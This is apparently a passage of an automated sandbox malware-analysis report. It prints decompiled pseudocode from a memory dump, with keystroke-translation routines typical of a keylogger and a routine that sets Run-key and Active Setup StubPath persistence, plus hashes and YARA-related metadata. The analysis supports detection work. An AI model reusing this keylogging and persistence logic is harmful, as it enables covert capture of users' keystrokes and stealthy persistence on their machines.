						_t115 = _t113;
						E100050D8();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t115;
						if(_t115 < 0) {
							do {
								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
								__eflags = _t52;
							} while (_t52 < 0);
						}
					}
				} else {
					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
					_t112 = _t104;
					E10003A34( *_t76, 0);
					if(0 == 0) {
						E100038E0(_t76, 0x80, _t118 - 0x30c);
						_t128 =  *((char*)(_t118 - 1));
						if( *((char*)(_t118 - 1)) == 0) {
							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
						} else {
							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
						}
					}
					_t56 =  *(_t118 - 0x20c);
					_t129 = _t56;
					if(_t129 != 0) {
						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
					}
					E100050D8();
				}
				E10003A34( *_t76, L"KeyDelBackspace");
				if(_t129 == 0) {
					E10003770(_t76);
				}
				_pop(_t88);
				 *[fs:eax] = _t88;
				_push(E100078BE);
				return E10003788(_t118 - 0x414, 2);
			}

0x10007233
0x10007233
0x1000723a
0x100076f0
0x100076f5
0x10007727
0x10007727
0x10007731
0x10007759
0x1000775d
0x1000780e
0x10007810
0x10007816
0x1000781f
0x10007836
0x10007838
0x10007839
0x10007845
0x1000784e
0x10007853
0x10007855
0x10007857
0x10007879
0x10007880
0x10007880
0x10007857
0x10007855
0x10007763
0x10007774
0x10007776
0x1000777b
0x10007780
0x1000778f
0x10007794
0x10007798
0x100077be
0x100077cb
0x1000779a
0x100077a2
0x100077af
0x100077af
0x10007798
0x100077d0
0x100077d6
0x100077d8
0x100077f8
0x100077f8
0x10007807
0x10007807
0x1000788b
0x10007890
0x10007894
0x10007894
0x1000789b
0x1000789e
0x100078a1
0x100078b6

APIs

Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879

Strings

Numpad, xrefs: 10007712
KeyDelBackspace, xrefs: 10007722, 10007886

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Unicode$Virtual$AllocString
String ID: KeyDelBackspace$Numpad
API String ID: 783433895-3409537306
Opcode ID: ad526f3a44082b4da89a5289e758324e4cba0574a2e660b1230691faf556a316
Instruction ID: 311b08e60e3b521a7c3a0356ba3012efa993796664cd4508c3663b1c0811d3ac
Opcode Fuzzy Hash: ad526f3a44082b4da89a5289e758324e4cba0574a2e660b1230691faf556a316
Instruction Fuzzy Hash: 9131C0B8F042545BF722DB658C45B9F73A9FB882C0F50C0A5F5489720ECA78EE45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 10007244, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 97
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E10007244(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
				int _t52;
				int _t56;
				intOrPtr* _t76;
				intOrPtr _t88;
				struct HKL__* _t104;
				struct HKL__* _t108;
				struct HKL__* _t112;
				int _t113;
				int _t115;
				void* _t118;
				int _t129;

				_t104 = __edi;
				_t76 = __ebx;
				E100037AC(__ebx, 0x100079c8);
				E10003A34( *__ebx, 0);
				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
					E100037AC(__ebx, L"KeyDelBackspace");
				}
				 *((char*)(_t118 - 1)) = E10006D04();
				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
				if(_t113 <= 0) {
					__eflags = _t113;
					if(_t113 < 0) {
						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
						_t108 = _t104;
						_t115 = _t113;
						E100050D8();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t115;
						if(_t115 < 0) {
							do {
								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
								__eflags = _t52;
							} while (_t52 < 0);
						}
					}
				} else {
					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
					_t112 = _t104;
					E10003A34( *_t76, 0);
					if(0 == 0) {
						E100038E0(_t76, 0x80, _t118 - 0x30c);
						_t128 =  *((char*)(_t118 - 1));
						if( *((char*)(_t118 - 1)) == 0) {
							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
						} else {
							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
						}
					}
					_t56 =  *(_t118 - 0x20c);
					_t129 = _t56;
					if(_t129 != 0) {
						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
					}
					E100050D8();
				}
				E10003A34( *_t76, L"KeyDelBackspace");
				if(_t129 == 0) {
					E10003770(_t76);
				}
				_pop(_t88);
				 *[fs:eax] = _t88;
				_push(E100078BE);
				return E10003788(_t118 - 0x414, 2);
			}

0x10007244
0x10007244
0x1000724b
0x100076f0
0x100076f5
0x10007727
0x10007727
0x10007731
0x10007759
0x1000775d
0x1000780e
0x10007810
0x10007816
0x1000781f
0x10007836
0x10007838
0x10007839
0x10007845
0x1000784e
0x10007853
0x10007855
0x10007857
0x10007879
0x10007880
0x10007880
0x10007857
0x10007855
0x10007763
0x10007774
0x10007776
0x1000777b
0x10007780
0x1000778f
0x10007794
0x10007798
0x100077be
0x100077cb
0x1000779a
0x100077a2
0x100077af
0x100077af
0x10007798
0x100077d0
0x100077d6
0x100077d8
0x100077f8
0x100077f8
0x10007807
0x10007807
0x1000788b
0x10007890
0x10007894
0x10007894
0x1000789b
0x1000789e
0x100078a1
0x100078b6

APIs

Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879

Strings

Numpad, xrefs: 10007712
KeyDelBackspace, xrefs: 10007722, 10007886

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Unicode$Virtual$AllocString
String ID: KeyDelBackspace$Numpad
API String ID: 783433895-3409537306
Opcode ID: 3018831f3d2d7d46207b6938651625027ba0aae8da63efaf5cfa44b6499e9dc2
Instruction ID: 74b2e92b555be62d4c67bea0bf12e908dc11cad6fd28d16d482c19b7e5004677
Opcode Fuzzy Hash: 3018831f3d2d7d46207b6938651625027ba0aae8da63efaf5cfa44b6499e9dc2
Instruction Fuzzy Hash: 9B31C0B8F042545BF722DB658C45B9F73A9FB882C0F50C0A5F5489720ECA78EE45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 100072BB, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 97
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E100072BB(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
				int _t52;
				int _t56;
				intOrPtr* _t76;
				intOrPtr _t88;
				struct HKL__* _t104;
				struct HKL__* _t108;
				struct HKL__* _t112;
				int _t113;
				int _t115;
				void* _t118;
				int _t129;

				_t104 = __edi;
				_t76 = __ebx;
				E100037AC(__ebx, 0x10007a58);
				E10003A34( *__ebx, 0);
				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
					E100037AC(__ebx, L"KeyDelBackspace");
				}
				 *((char*)(_t118 - 1)) = E10006D04();
				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
				if(_t113 <= 0) {
					__eflags = _t113;
					if(_t113 < 0) {
						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
						_t108 = _t104;
						_t115 = _t113;
						E100050D8();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t115;
						if(_t115 < 0) {
							do {
								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
								__eflags = _t52;
							} while (_t52 < 0);
						}
					}
				} else {
					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
					_t112 = _t104;
					E10003A34( *_t76, 0);
					if(0 == 0) {
						E100038E0(_t76, 0x80, _t118 - 0x30c);
						_t128 =  *((char*)(_t118 - 1));
						if( *((char*)(_t118 - 1)) == 0) {
							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
						} else {
							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
						}
					}
					_t56 =  *(_t118 - 0x20c);
					_t129 = _t56;
					if(_t129 != 0) {
						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
					}
					E100050D8();
				}
				E10003A34( *_t76, L"KeyDelBackspace");
				if(_t129 == 0) {
					E10003770(_t76);
				}
				_pop(_t88);
				 *[fs:eax] = _t88;
				_push(E100078BE);
				return E10003788(_t118 - 0x414, 2);
			}

0x100072bb
0x100072bb
0x100072c2
0x100076f0
0x100076f5
0x10007727
0x10007727
0x10007731
0x10007759
0x1000775d
0x1000780e
0x10007810
0x10007816
0x1000781f
0x10007836
0x10007838
0x10007839
0x10007845
0x1000784e
0x10007853
0x10007855
0x10007857
0x10007879
0x10007880
0x10007880
0x10007857
0x10007855
0x10007763
0x10007774
0x10007776
0x1000777b
0x10007780
0x1000778f
0x10007794
0x10007798
0x100077be
0x100077cb
0x1000779a
0x100077a2
0x100077af
0x100077af
0x10007798
0x100077d0
0x100077d6
0x100077d8
0x100077f8
0x100077f8
0x10007807
0x10007807
0x1000788b
0x10007890
0x10007894
0x10007894
0x1000789b
0x1000789e
0x100078a1
0x100078b6

APIs

Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879

Strings

Numpad, xrefs: 10007712
KeyDelBackspace, xrefs: 10007722, 10007886

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Unicode$Virtual$AllocString
String ID: KeyDelBackspace$Numpad
API String ID: 783433895-3409537306
Opcode ID: 58d40c07809cf6c1f88f00f7cd4d01a1027e2dbe51f130ce30c58b48c389b237
Instruction ID: 033e83d321774fcd4bda94542bc8b64ee5515bfb92d199e6e3b91a957bdcd820
Opcode Fuzzy Hash: 58d40c07809cf6c1f88f00f7cd4d01a1027e2dbe51f130ce30c58b48c389b237
Instruction Fuzzy Hash: 0831C0B8F042545BF722CB658C45B9F73A9FB882C0F50C0A5F5489720ECA78EE45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 100072EE, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 97
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E100072EE(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
				int _t52;
				int _t56;
				intOrPtr* _t76;
				intOrPtr _t88;
				struct HKL__* _t104;
				struct HKL__* _t108;
				struct HKL__* _t112;
				int _t113;
				int _t115;
				void* _t118;
				int _t129;

				_t104 = __edi;
				_t76 = __ebx;
				E100037AC(__ebx, 0x10007a98);
				E10003A34( *__ebx, 0);
				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
					E100037AC(__ebx, L"KeyDelBackspace");
				}
				 *((char*)(_t118 - 1)) = E10006D04();
				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
				if(_t113 <= 0) {
					__eflags = _t113;
					if(_t113 < 0) {
						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
						_t108 = _t104;
						_t115 = _t113;
						E100050D8();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t115;
						if(_t115 < 0) {
							do {
								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
								__eflags = _t52;
							} while (_t52 < 0);
						}
					}
				} else {
					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
					_t112 = _t104;
					E10003A34( *_t76, 0);
					if(0 == 0) {
						E100038E0(_t76, 0x80, _t118 - 0x30c);
						_t128 =  *((char*)(_t118 - 1));
						if( *((char*)(_t118 - 1)) == 0) {
							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
						} else {
							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
						}
					}
					_t56 =  *(_t118 - 0x20c);
					_t129 = _t56;
					if(_t129 != 0) {
						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
					}
					E100050D8();
				}
				E10003A34( *_t76, L"KeyDelBackspace");
				if(_t129 == 0) {
					E10003770(_t76);
				}
				_pop(_t88);
				 *[fs:eax] = _t88;
				_push(E100078BE);
				return E10003788(_t118 - 0x414, 2);
			}

0x100072ee
0x100072ee
0x100072f5
0x100076f0
0x100076f5
0x10007727
0x10007727
0x10007731
0x10007759
0x1000775d
0x1000780e
0x10007810
0x10007816
0x1000781f
0x10007836
0x10007838
0x10007839
0x10007845
0x1000784e
0x10007853
0x10007855
0x10007857
0x10007879
0x10007880
0x10007880
0x10007857
0x10007855
0x10007763
0x10007774
0x10007776
0x1000777b
0x10007780
0x1000778f
0x10007794
0x10007798
0x100077be
0x100077cb
0x1000779a
0x100077a2
0x100077af
0x100077af
0x10007798
0x100077d0
0x100077d6
0x100077d8
0x100077f8
0x100077f8
0x10007807
0x10007807
0x1000788b
0x10007890
0x10007894
0x10007894
0x1000789b
0x1000789e
0x100078a1
0x100078b6

APIs

Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879

Strings

Numpad, xrefs: 10007712
KeyDelBackspace, xrefs: 10007722, 10007886

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Unicode$Virtual$AllocString
String ID: KeyDelBackspace$Numpad
API String ID: 783433895-3409537306
Opcode ID: aa20c933a58f2305242e8b78a34cde6f3360a0dc9dcf15ed5906f17daae1d160
Instruction ID: c55d23e60b6bc9fae09bc4a5971d47f8544ea9c2ea09269a4cd522e11abc3ca6
Opcode Fuzzy Hash: aa20c933a58f2305242e8b78a34cde6f3360a0dc9dcf15ed5906f17daae1d160
Instruction Fuzzy Hash: 5E31C0B8F042545BF722CB658C45B9F73A9FB892C0F50C0A5F6489720ECA78EE45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 10009E6C, Relevance: 6.4, Strings: 5, Instructions: 162
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E10009E6C(intOrPtr* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				intOrPtr _v117;
				void _v1264;
				char _v1386;
				char _v1508;
				char _v1509;
				char _v1510;
				char _v1511;
				char _v1512;
				char _v1634;
				char _v1756;
				char _v1878;
				char _v1880;
				void _v5028;
				char _v5032;
				char _v5036;
				char _v5040;
				char _v5044;
				char _v5048;
				char _v5052;
				char _v5056;
				char _v5060;
				void _v5184;
				char _v5188;
				char _v5192;
				intOrPtr* _t61;
				void* _t91;
				void* _t129;
				intOrPtr _t155;
				void* _t191;
				void* _t192;
				void* _t202;

				_t127 = __ebx;
				_t61 = __eax +  *__eax;
				 *_t61 =  *_t61 + _t61;
				_pop(_t192);
				 *_t61 =  *_t61 + _t61;
				_v117 = _v117 + __edx;
				_t191 = _t192;
				_t129 = 0x288;
				do {
					_push(0);
					_push(0);
					_t129 = _t129 - 1;
				} while (_t129 != 0);
				_push(_t129);
				_push(__ebx);
				_t189 = __edx;
				_v8 = memcpy( &_v5028, __edx, 0x4e4 << 2);
				E10003C28( &_v8);
				_push(_t191);
				_push(0x1000a113);
				_push( *[fs:eax]);
				 *[fs:eax] = _t192 + 0xc;
				if(_v1880 != 0) {
					_t199 = _v1512 - 1;
					if(_v1512 == 1) {
						E100038E0( &_v5032, 0x3d,  &_v1878);
						E1000577C(0x80000002, __ebx, _v5032, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run", _t189, _t199, 2, _v8);
					}
					_t200 = _v1511 - 1;
					if(_v1511 == 1) {
						E100038E0( &_v5036, 0x3d,  &_v1756);
						E1000577C(0x80000001, _t127, _v5036, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run", _t189, _t200, 2, _v8);
					}
					_t201 = _v1510 - 1;
					if(_v1510 == 1) {
						E100038E0( &_v5044, 0x3d,  &_v1634);
						E10003988( &_v5040, _v5044, L"Software\\Microsoft\\Active Setup\\Installed Components\\", _t201);
						E100059E8(0x80000001, _t127, _v5040, _t201);
						E10003988( &_v5048, L" restart", _v8, _t201);
						E100038E0( &_v5056, 0x3d,  &_v1634);
						E10003988( &_v5052, _v5056, L"Software\\Microsoft\\Active Setup\\Installed Components\\", _t201);
						E1000577C(0x80000002, _t127, L"StubPath", _v5052, _t189, _t201, 2, _v5048);
					}
					_t202 = _v1509 - 1;
					if(_t202 == 0) {
						E100034B0( &_v5060, 0x3d,  &_v1264);
						E1000362C(_v5060, "%SERVER%");
						if(_t202 == 0) {
							E10005240(_v8, _t127, 0x3d,  &_v5184);
							_t189 =  &_v5184;
							memcpy( &_v1264,  &_v5184, 0x1e << 2);
							asm("movsw");
						}
						E100038E0( &_v16, 0x3d,  &_v1508);
						E10003AB8(_v16, E10003B94(0x1000a23c, _v16) - 1, 1, E10003B94(0x1000a23c, _v16) - 1,  &_v12);
						E10003B04( &_v16, E10003B94(0x1000a23c, _v16), 1, E10003B94(0x1000a23c, _v16) - 1);
						_t91 = E10005A94(_v12, _t127, _t87);
						E100038E0( &_v5188, 0x3d,  &_v1264);
						E100038E0( &_v5192, 0x3d,  &_v1386);
						E1000577C(_t91, _t91, _v5192, _v16, _t189, E10003B94(0x1000a23c, _v16) - 1, 2, _v5188);
					}
				}
				_pop(_t155);
				 *[fs:eax] = _t155;
				_push(E1000A11A);
				E10003788( &_v5192, 2);
				E100032CC( &_v5060);
				E10003788( &_v5056, 7);
				return E10003788( &_v16, 3);
			}

0x10009e6c
0x10009e6c
0x10009e6e
0x10009e70
0x10009e71
0x10009e73
0x10009e75
0x10009e77
0x10009e7c
0x10009e7c
0x10009e7e
0x10009e80
0x10009e80
0x10009e83
0x10009e84
0x10009e87
0x10009e96
0x10009e9c
0x10009ea3
0x10009ea4
0x10009ea9
0x10009eac
0x10009eb6
0x10009ebc
0x10009ec3
0x10009edc
0x10009ef1
0x10009ef1
0x10009ef6
0x10009efd
0x10009f16
0x10009f2b
0x10009f2b
0x10009f30
0x10009f37
0x10009f4e
0x10009f64
0x10009f74
0x10009f87
0x10009fa6
0x10009fbc
0x10009fd1
0x10009fd1
0x10009fd6
0x10009fdd
0x10009ff4
0x1000a004
0x1000a009
0x1000a014
0x1000a019
0x1000a02a
0x1000a02c
0x1000a02c
0x1000a03c
0x1000a05d
0x1000a079
0x1000a081
0x1000a099
0x1000a0b8
0x1000a0c8
0x1000a0c8
0x10009fdd
0x1000a0cf
0x1000a0d2
0x1000a0d5
0x1000a0e5
0x1000a0f0
0x1000a100
0x1000a112

Strings

%SERVER%, xrefs: 10009FFF
StubPath, xrefs: 10009FC7
restart, xrefs: 10009F7F
Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 10009EE7, 10009F21
Software\Microsoft\Active Setup\Installed Components\, xrefs: 10009F5F, 10009FB7

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: CloseCreateFreeStringValue
String ID: restart$%SERVER%$Software\Microsoft\Active Setup\Installed Components\$Software\Microsoft\Windows\CurrentVersion\Run$StubPath
API String ID: 523044198-2142522223
Opcode ID: 364ad897bbca38481dd1a11b2b492bd1a693bcb91c63773ed721ecd4ba2295bf
Instruction ID: ccd5ba8bb55e14e3b401f0629b5d5422583a699d941ac8acb34279bb9c56e552
Opcode Fuzzy Hash: 364ad897bbca38481dd1a11b2b492bd1a693bcb91c63773ed721ecd4ba2295bf
Instruction Fuzzy Hash: A4619438A0415D9FEB25C750C881BDEB3BEEF45380F8081D6A908A768ADB756F85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 10009E70, Relevance: 6.4, Strings: 5, Instructions: 160
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E10009E70(intOrPtr* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				intOrPtr _v117;
				void _v1264;
				char _v1386;
				char _v1508;
				char _v1509;
				char _v1510;
				char _v1511;
				char _v1512;
				char _v1634;
				char _v1756;
				char _v1878;
				char _v1880;
				void _v5028;
				char _v5032;
				char _v5036;
				char _v5040;
				char _v5044;
				char _v5048;
				char _v5052;
				char _v5056;
				char _v5060;
				void _v5184;
				char _v5188;
				char _v5192;
				void* _t90;
				void* _t128;
				intOrPtr _t154;
				void* _t190;
				void* _t191;
				void* _t200;

				_t126 = __ebx;
				_pop(_t191);
				 *__eax =  *__eax + __eax;
				_v117 = _v117 + __edx;
				_t190 = _t191;
				_t128 = 0x288;
				do {
					_push(0);
					_push(0);
					_t128 = _t128 - 1;
				} while (_t128 != 0);
				_push(_t128);
				_push(__ebx);
				_t188 = __edx;
				_v8 = memcpy( &_v5028, __edx, 0x4e4 << 2);
				E10003C28( &_v8);
				_push(_t190);
				_push(0x1000a113);
				_push( *[fs:eax]);
				 *[fs:eax] = _t191 + 0xc;
				if(_v1880 != 0) {
					_t197 = _v1512 - 1;
					if(_v1512 == 1) {
						E100038E0( &_v5032, 0x3d,  &_v1878);
						E1000577C(0x80000002, __ebx, _v5032, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run", _t188, _t197, 2, _v8);
					}
					_t198 = _v1511 - 1;
					if(_v1511 == 1) {
						E100038E0( &_v5036, 0x3d,  &_v1756);
						E1000577C(0x80000001, _t126, _v5036, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run", _t188, _t198, 2, _v8);
					}
					_t199 = _v1510 - 1;
					if(_v1510 == 1) {
						E100038E0( &_v5044, 0x3d,  &_v1634);
						E10003988( &_v5040, _v5044, L"Software\\Microsoft\\Active Setup\\Installed Components\\", _t199);
						E100059E8(0x80000001, _t126, _v5040, _t199);
						E10003988( &_v5048, L" restart", _v8, _t199);
						E100038E0( &_v5056, 0x3d,  &_v1634);
						E10003988( &_v5052, _v5056, L"Software\\Microsoft\\Active Setup\\Installed Components\\", _t199);
						E1000577C(0x80000002, _t126, L"StubPath", _v5052, _t188, _t199, 2, _v5048);
					}
					_t200 = _v1509 - 1;
					if(_t200 == 0) {
						E100034B0( &_v5060, 0x3d,  &_v1264);
						E1000362C(_v5060, "%SERVER%");
						if(_t200 == 0) {
							E10005240(_v8, _t126, 0x3d,  &_v5184);
							_t188 =  &_v5184;
							memcpy( &_v1264,  &_v5184, 0x1e << 2);
							asm("movsw");
						}
						E100038E0( &_v16, 0x3d,  &_v1508);
						E10003AB8(_v16, E10003B94(0x1000a23c, _v16) - 1, 1, E10003B94(0x1000a23c, _v16) - 1,  &_v12);
						E10003B04( &_v16, E10003B94(0x1000a23c, _v16), 1, E10003B94(0x1000a23c, _v16) - 1);
						_t90 = E10005A94(_v12, _t126, _t86);
						E100038E0( &_v5188, 0x3d,  &_v1264);
						E100038E0( &_v5192, 0x3d,  &_v1386);
						E1000577C(_t90, _t90, _v5192, _v16, _t188, E10003B94(0x1000a23c, _v16) - 1, 2, _v5188);
					}
				}
				_pop(_t154);
				 *[fs:eax] = _t154;
				_push(E1000A11A);
				E10003788( &_v5192, 2);
				E100032CC( &_v5060);
				E10003788( &_v5056, 7);
				return E10003788( &_v16, 3);
			}

0x10009e70
0x10009e70
0x10009e71
0x10009e73
0x10009e75
